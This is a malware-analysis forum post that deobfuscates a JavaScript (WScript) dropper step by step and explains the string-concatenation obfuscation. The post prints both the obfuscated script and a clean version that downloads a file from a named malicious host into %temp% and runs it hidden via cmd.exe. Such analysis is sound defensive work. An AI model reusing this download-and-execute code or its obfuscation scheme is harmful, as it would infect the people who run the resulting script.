var otenuti4 = ["=40", "etocc", "ciqi", "87310", "nynkopy"]
return otenuti4[0];
}
var tujfomda = ["64705", "28989", "lFo", "iwzato", "ytyzo", "46984", "yqaf"];
var ryjetky = ["gth", "81677", "ropyja", "46655", "70486", "43429", "92379"];
var ycavwudco0 = ["16718", "dtywmakfihp", "ipmivc", "Po", "qekcenexl"];

function nhepo8() {
var tlyjipry6 = ["xifqygqefg", "Na", "opnonarm"]
return tlyjipry6[1];
}
var iwtan3 = ["klome", "vsirifax", "49597", "45431", "22644", "66295", "Typ", "liqkofjelb", "68450", "26508"];

function ozmivlade() {
var efpuxlyri0 = [];
efpuxlyri0["eqacdek"] = "TP";
efpuxlyri0["ovumq"] = "vpyqhape";
efpuxlyri0["eqibp"] = 'lkubnujl';
return efpuxlyri0["eqacdek"];
}
function ogodi() {
var hwihte = ["jtecjin", "pudymw", "leSy", "33345", "86830", "fmerbakgo"]
return hwihte[2];
}
var vutu7 = ["kqucziznut", "65671", "47825", "48117", "93815", "romi", "stem"];
var etgydy = ["fovjuqhykz", "ekcagep", "gsenquhyx", "ptin", "21763"];
var rvotok9 = [461, "93513"];
var twopbymo5 = ["50125", "57902", "itos", "0", "odnadado", "athijpeks", "lgetko", "djomosy"];
var ubguhxy3 = ["midi", "ofbih", "48835", "42460", "94271", "rvuqsi", "Tem"];
var sulbulvy1 = ["nhidxu", "31367", "22982", "obburdojka", 58, "xyxcuhx", "pmincig", "79035"];

function yvyc() {
var zixnetmu8 = ["ujymrytt", "eam", "35221"]
return zixnetmu8[1];
}
var uqyte0 = [75, "44462", "ixsexlirm", "61212", "agemfu", "ogydsa", "jepvodu", "40780", "vixwo"];
var ykible = ["cejkofa", "ekmero", "d", "pufjol"];
var vfebupa8 = ["enaw", "68684", "90905", "72837", "umantat", "xdaranni", "l"];

function ygiqxi() {
var ugus = ["87874", "azhaflejv", "oxoqyme", "ct"]
return ugus[3];
}
function gdihuxtih6() {
var ulnelepo0 = [];
ulnelepo0["yrpijwanr"] = "gamlemw";
ulnelepo0["otzyrla"] = bupy() + hgagremumf1() + cuqelh() + erikyhi() + atnyvky[5] + ybiwecri6[0] + owugb();
ulnelepo0["hkotge"] = "avih";
return ulnelepo0["otzyrla"];
}
function ilabqe() {
var jyhi = ["ofoqzefu", "80888", "aqdikpyku", "sapuwv", "62510", axraxyfg[0] + qothoqny0[3], "94185", "14921"]
return jyhi[5];
}
function yrpyvmy9() {
var kwatsyf = [];
kwatsyf["tboramy"] = azdyvurc4[0] + uwtiq8[1];
kwatsyf["yqubqulp"] = 'xnujoka';
kwatsyf["ugodr"] = 'nigywr';
kwatsyf["epuxyxfu"] = 'enykhi';
kwatsyf["hmihrag"] = 'wybolvy';
return kwatsyf["tboramy"];
}
function opraw() {
var fovicyhn = ["gsohemam", "90049", "icotvish", "76371", "vdyhi", "71193", "dqyrim", iwtan3[6] + qtymu[2], "72111", "12253"]
return fovicyhn[7];
}
function cubqog0() {
var uqusjy6 = ["rwongu", lynatvo1() + sorajib[2], "78754", "48238", "sekcozfejc", "36381", "ernehkeha", "99241", "16852", "43905"]
return uqusjy6[1];
}
function zkyketxiz0() {
var wekquzt6 = [ahibo3[1] + irjync6() + ypyze3() + tujfomda[2] + ktekpaq8() + akahu7[8], "68483", "20910", "ohzobibno", "16479", "wnogrydbulj", "eknocedh", "otalcodgo"]
return wekquzt6[0];
}
function aqyl() {
var valsil7 = ["30681", "rgarvugke", "alyxhid", "97863", "90712", "nygucx", "35163", atuvcijby[3] + ubguhxy3[6] + rgegqitt() + vella5(), "asyqdego"]
return valsil7[7];
}
function rompyqh() {
var choftyrort = [ycavwudco0[3] + usogzicy0() + ilusbilj[5] + vxajy7[1], "43184"]
return choftyrort[0];
}
function amalxudx3() {
var pnakalf0 = ["91199", "64940", "30676", "79876", "87961", "33032", "hutwezu", ahmul[2] + ecwyda[0]]
return pnakalf0[7];
}
function dfejy1() {
var inoh = ["20984", "75849", "22996", txidohlegw() + hbodrych0()]
return inoh[3];
}
function uhqer1() {
var namafg3 = [];
namafg3["ipoj"] = "tsoswokr";
namafg3["cbasguptib"] = gbaxhu0() + unifhers0[0] + quxa() + wbegukas[1] + anuruj1() + vunbej0[0];
namafg3["pmekyzu"] = 'jmonogt';
namafg3["inif"] = 'gwaxakqu';
namafg3["atcytx"] = 'eqipcexh';
return namafg3["cbasguptib"];
}
function alevrur1() {
var kukni = [];
kukni["rleqqafwo"] = bvaqfoxic() + mipjaliwr2[1] + anys7[0] + coppygy();
kukni["detildynk"] = "hlorhej";
kukni["ufykfe"] = 'wtufedo';
kukni["eposyllu"] = "pejxyq";
return kukni["rleqqafwo"];
}
function kwobo() {
var egadig4 = ["57871", "utjywlu", "92419", ajgepzy[1] + ljubdu[0] + xravsamy(), "77245", "60351", "rodip", "atsorecx", "98210"]
return egadig4[3];
}
function axtexik5() {
var mbumossi = ["27252", "bcande", ocefp7[1] + ijjabko1(), "23156", "pubjobze", "urqirno"]
return mbumossi[2];
}
try {
var ygjijzigz8 = emavor;
if (!ygjijzigz8[wjucyfas8() + aqemwe2() + mzedjyl() + untyqu9[3] + pgecobo5[2]][nhepo8() + ossimqe8() + ykible[2]][jtoxri3[1] + ryjetky[0]]) {
var lyvpuf4 = eval(obovgenb() + picqex[0] + yrat7[4] + pwymujohm[1] + nedidot0[1]);
}
var udluw = tamru0() + ixmyme7[0] + ojaqo[1] + mryfcupb[1] + ozmivlade();
var nahybixfo5 = ygjijzigz8[gdihuxtih6()];
var zusedzary0 = irqyzp4[3] + dqicdakv() + axpiss[4] + upbohykre() + fbomorc5[0] + kbukeqqown2() + ytax9() + yjarubh[7] + taca3() + axyhyz9() + upyqo() + twopbymo5[3];
var ywfuwom1 = vsali6[0] + etgydy[3] + yccejihk() + ogodi() + vutu7[6] + dowqi6() + ygiqxi();
var hibsos = new lyvpuf4(udluw);
var ogyc6 = awdycfis() + ototmu8() + umjukliqdy7() + yvyc();
var exobvy8 = new lyvpuf4(ywfuwom1);
hibsos[ilabqe()](ewdexsy5[3], zusedzary0, dxyqwab3[6] - 392);
var ezus = new lyvpuf4(ogyc6);
ezus[yrpyvmy9()]();
ezus[opraw()] = opikomg1[0] - sulbulvy1[4];
var ykxupuwx = ylnurvagr3[4] + arqacha8() + occuza[2] + sviniv3() + cesegumk[1] + mtesqamygl8() + vfebupa8[6];
hibsos[cubqog0()]();
var wiroxywsy6 = exobvy8[zkyketxiz0()](rvotok9[0] - exednycmu4[1]) + yzkezu[0] + exobvy8[aqyl()]();
var catongo = jpuqnoxg() + biltaloj[0] + mjykjujej[1] + rufolly() + wiroxywsy6;
ezus[rompyqh()] = qkusaza[5] - 838;
var ygewx = new lyvpuf4(ykxupuwx);
if (hibsos[amalxudx3()] == aflirvir1[0] - uqyte0[0]) {
ezus[dfejy1()](hibsos[uhqer1()]);
ezus[alevrur1()](wiroxywsy6);
ezus[kwobo()]();
ygewx[axtexik5()](catongo, dxyqwab3[6] - 392);
}
} catch (thumrobo) {}

2) Explanation of the obfuscation method :

The important part is in the try...catch

All the functions and vars before this part are used to hide the real functions, url, etc..

Using concatenation of string by calling functions, using arrays of string with a mix of useless and useful string values, it makes harder to understand what the script does.

Look at the more important part :

try {

var ygjijzigz8 = emavor;
if (!ygjijzigz8[wjucyfas8() + aqemwe2() + mzedjyl() + untyqu9[3] + pgecobo5[2]][nhepo8() + ossimqe8() + ykible[2]][jtoxri3[1] + ryjetky[0]]) {

var lyvpuf4 = eval(obovgenb() + picqex[0] + yrat7[4] + pwymujohm[1] + nedidot0[1]);
}
var udluw = tamru0() + ixmyme7[0] + ojaqo[1] + mryfcupb[1] + ozmivlade();
var nahybixfo5 = ygjijzigz8[gdihuxtih6()];
var zusedzary0 = irqyzp4[3] + dqicdakv() + axpiss[4] + upbohykre() + fbomorc5[0] + kbukeqqown2() + ytax9() + yjarubh[7] + taca3() + axyhyz9() + upyqo() + twopbymo5[3];
var ywfuwom1 = vsali6[0] + etgydy[3] + yccejihk() + ogodi() + vutu7[6] + dowqi6() + ygiqxi();
var hibsos = new lyvpuf4(udluw);
var ogyc6 = awdycfis() + ototmu8() + umjukliqdy7() + yvyc();
var exobvy8 = new lyvpuf4(ywfuwom1);
hibsos[ilabqe()](ewdexsy5[3], zusedzary0, dxyqwab3[6] - 392);
var ezus = new lyvpuf4(ogyc6);
ezus[yrpyvmy9()]();
ezus[opraw()] = opikomg1[0] - sulbulvy1[4];
var ykxupuwx = ylnurvagr3[4] + arqacha8() + occuza[2] + sviniv3() + cesegumk[1] + mtesqamygl8() + vfebupa8[6];
hibsos[cubqog0()]();
var wiroxywsy6 = exobvy8[zkyketxiz0()](rvotok9[0] - exednycmu4[1]) + yzkezu[0] + exobvy8[aqyl()]();
var catongo = jpuqnoxg() + biltaloj[0] + mjykjujej[1] + rufolly() + wiroxywsy6;
ezus[rompyqh()] = qkusaza[5] - 838;
var ygewx = new lyvpuf4(ykxupuwx);
if (hibsos[amalxudx3()] == aflirvir1[0] - uqyte0[0]) {

ezus[dfejy1()](hibsos[uhqer1()]);
ezus[alevrur1()](wiroxywsy6);
ezus[kwobo()]();
ygewx[axtexik5()](catongo, dxyqwab3[6] - 392);
}
} catch (thumrobo) {}

Some examples :

var ygjijzigz8 = emavor;

=> var emavor = [WScript, "yjmitsyhn", "ohxonv", "94855"][0];
=> var emavor = [WScript,
"yjmitsyhn", "ohxonv", "94855"][0];
=> emavor = WScript object

The same way, beginning from the try...catch part, we just have to replace the functions by returned data and vars / arrays with the good strings.

wjucyfas8() + aqemwe2() + mzedjyl() + untyqu9[3] + pgecobo5[2]

"Ar" + "gu" + "me" + "nt" + "s"
=> "Arguments"

nhepo8() + ossimqe8() + ykible[2]

"Na" + "me" + ""d"
=> "Named"

jtoxri3[1] + ryjetky[0]

"len" + "gth"
=> length​

A last example :

ezus[yrpyvmy9()]();

Let's find yrpyvmy9()

function yrpyvmy9() {
var kwatsyf = [];
kwatsyf["tboramy"] = azdyvurc4[0] + uwtiq8[1];
kwatsyf["yqubqulp"] = 'xnujoka';
kwatsyf["ugodr"] = 'nigywr';
kwatsyf["epuxyxfu"] = 'enykhi';
kwatsyf["hmihrag"] = 'wybolvy';

return kwatsyf["tboramy"];
}

it returns kwatsyf["tboramy"];

=> kwatsyf["tboramy"] = azdyvurc4[0] + uwtiq8[1];

=> azdyvurc4[0] + uwtiq8[1];

var azdyvurc4 = ['
Op', "ugidu", "22792", "52245", "rvafwinle", "55932", "72416", "lhysa"];

var uwtiq8 = ["31226", '
en', "73707", "23428", "55818", "14746", "cahwoq", "30285", "89537", "12574"];

=> yrpyvmy9() = "Open";

Etc,...

3) Deobfuscation :

try {
var ygjijzigz8 = WScript;
if (!
WScript["Arguments"]["Named"]["Length"]) {

var lyvpuf4 = eval("ActiveXObject");
=> here the eval allows to transform the string on an ActiveXObject object
}
var udluw ="
MSXML2.XMLHTTP";
var nahybixfo5 =
WScript["ScriptfullName"];
var zusedzary0 ="http ://ekoosad.top/admin.php?f=400";
var ywfuwom1 ="
Scripting.FileSystemObject";
var hibsos = new
ActiveXObject("MSXML2.XMLHTTP"); => http object
var ogyc6 = "ADODB.Stream";
var exobvy8 = new ActiveXObject("Scripting.FileSystemObject");
hibsos["
Open"]("GET", zusedzary0, 0 ); => "http ://ekoosad.top/admin.php?f=400";
var ezus = new ActiveXObject("
ADODB.Stream");
ezus["
Open"]();
ezus[
"Type"] =1;
var ykxupuwx ="
WScript.Shell";
hibsos["
send"](); => request done !
var wiroxywsy6 = exobvy8["GetSpecialFolder"](2) + "\\" + exobvy8["GetTempName"]();
var catongo =
"cmd.exe /c " + wiroxywsy6;
ezus[
"Position"] = 0;
var ygewx = new
ActiveXObject("WScript.Shell");
if (hibsos["
Status"] == 200) {
ezus["Write"](hibsos["ResponseBody"]);
ezus["
saveToFile"](wiroxywsy6);
ezus[
"Close"]();
ygewx["
run"()](catongo,0);
}
} catch (thumrobo) {}

More understandable :

try {
var objWScript= WScript;

if (!
WScript.Arguments.Named.Length) {

var objActiveXObject= eval("ActiveXObject");
}

var url ="http ://ekoosad.top/admin.php?f=400";
var http ="
MSXML2.XMLHTTP";
var shell="
WScript.Shell";
var stream = "
ADODB.Stream";
var fso ="
Scripting.FileSystemObject";

var script_path =
WScript.ScriptfullName; => not used !!???

var obj_Http= new ActiveXObject("MSXML2.XMLHTTP");
var obj_FileSystemObject= new
ActiveXObject("Scripting.FileSystemObject");

var obj_Stream = new ActiveXObject("ADODB.Stream");
obj_Stream.
Open();
obj_Stream.Type =1;

obj_Http.Open("GET", url, 0 ); => "http ://ekoosad.top/admin.php?f=400";
obj_Http.
send(); => request done !

var path = obj_FileSystemObject.GetSpecialFolder(2) + "\\" + obj_FileSystemObject.GetTempName();

var execute ="cmd.exe /c " + path;

obj_Stream.Position = 0;

var obj_shell = new ActiveXObject("WScript.Shell");


if (obj_Http.Status == 200) {

obj_Stream.Write(obj_Http.ResponseBody);
obj_Stream.
saveToFile(path);
obj_Stream.
Close();
obj_shell.
run(execute,0);
}

} catch (exception) {}

4) Explanation :

A file is downloaded from http ://ekoosad.top/admin.php?f=400
and saved to : %temp%\RandomName (example : %temp%\radBACD3.tmp)
then it is run with cmd.exe /c

See here for more details
https://malwaretips.com/threads/quick-analysis-of-obfuscated-wanda-js-js-locky-m3-eldorado.62394/
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top